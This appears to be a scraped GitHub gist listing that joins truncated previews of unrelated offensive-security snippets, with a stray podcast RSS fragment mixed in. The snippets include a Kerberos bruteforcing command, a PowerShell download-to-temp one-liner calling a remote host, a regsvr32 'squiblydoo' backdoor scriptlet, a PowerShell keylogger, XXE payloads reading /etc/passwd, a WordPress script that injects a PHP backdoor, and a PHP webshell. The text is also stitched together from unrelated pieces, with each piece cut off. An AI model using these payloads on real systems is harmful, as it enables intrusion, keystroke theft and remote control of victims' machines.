febiNJ febinrev

@febinrev
febinrev / kerberos_attacks_cheatsheet.md
Created June 9, 2020 07:36 — forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform Kerberos attacks

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

@S3cur3Th1sSh1t
S3cur3Th1sSh1t / Invoke-winPEAS.ps1
Created April 8, 2020 13:10
winPEAS in powershell
function Invoke-winPEAS
{
[CmdletBinding()]
Param (
[Parameter(Position = 0, Mandatory = $true)]
[ValidateNotNullorEmpty()]
[String]
$Command
)
@jakekarnes42
jakekarnes42 / host_getter.svg
Created August 13, 2019 23:44
An SVG "image" that uses an XXE attack to embed the hostname file of whichever system processes it into the image itself
@intrd
intrd / powershell_wget_oneliner.ps1
Last active October 16, 2021 11:33
Powershell WGET one-liner (anyver)
# Powershell oneliner wget (anyver)
# http://dann.com.br/
@powershell -NoProfile -ExecutionPolicy unrestricted -Command (new-object System.Net.WebClient).Downloadfile('http://10.10.10.10:7000/iw4455.exe', 'C:\windows\temp\iw4455.exe')
@enigma0x3
enigma0x3 / Backdoor-Minimalist.sct
Last active March 9, 2025 06:49
Execute Remote Scripts Via regsvr32.exe - Referred to As "squiblydoo" Please use this reference...
<?XML version="1.0"?>
<scriptlet>
<registration
progid="PoC"
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
<!-- Proof Of Concept - Casey Smith @subTee -->
<!-- License: BSD3-Clause -->
<script language="JScript">
<![CDATA[
<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:cc="http://web.resource.org/cc/" xmlns:itunes="http://www.itunes.com/dtds/podcast-1.0.dtd" xmlns:media="http://search.yahoo.com/mrss/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<channel>
<atom:link href="http://dataskeptic.libsyn.com/rss" rel="self" type="application/rss+xml"/>
<title>Data Skeptic</title>
<pubDate>Fri, 15 Jan 2016 15:00:00 +0000</pubDate>
<lastBuildDate>Fri, 15 Jan 2016 15:08:58 +0000</lastBuildDate>
<generator>Libsyn WebEngine 2.0</generator>
<link>http://dataskeptic.com</link>
<language>en</language>
@dasgoll
dasgoll / gist:7ca1c059dd3b3fbc7277
Created December 11, 2015 16:44
Simple Windows Keylogger using PowerShell
#requires -Version 2
function Start-KeyLogger($Path="$env:temp\keylogger.txt")
{
# Signatures for API Calls
$signatures = @'
[DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)]
public static extern short GetAsyncKeyState(int virtualKeyCode);
[DllImport("user32.dll", CharSet=CharSet.Auto)]
public static extern int GetKeyboardState(byte[] keystate);
[DllImport("user32.dll", CharSet=CharSet.Auto)]
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE title [ <!ELEMENT title ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
<title>The Blog</title>
<link>http://example.com/</link>
<description>A blog about things</description>
<lastBuildDate>Mon, 03 Feb 2014 00:00:00 -0000</lastBuildDate>
<item>
@ethicalhack3r
ethicalhack3r / backdoor.js
Last active May 3, 2023 16:53
wp backdoor exploit (injects a PHP backdoor)
var wpnonce = '';
function getCSRFNonce(callback)
{
var re = /<input type="hidden" id="_wpnonce" name="_wpnonce" value="(\w*)" \/>/
var xhr = new XMLHttpRequest();
xhr.open("GET", "http://mywordpress.com/wordpress/wordpress-475/wp-admin/theme-editor.php?file=index.php&theme=twentyseventeen", true);
xhr.withCredentials = true;
xhr.overrideMimeType('text/xml');
@RyanKung
RyanKung / webshell.php
Last active March 22, 2022 05:19
a simple webshell
<?php session_start(); ?>
<?php
if (empty($_SESSION['path'])) {
$_SESSION['user'] = shell_exec('whoami');
$_SESSION['host'] = shell_exec('hostname');
$_SESSION['path'] = dirname(__FILE__);
}
function showInfo($cmd) {
$user = $_SESSION['user'];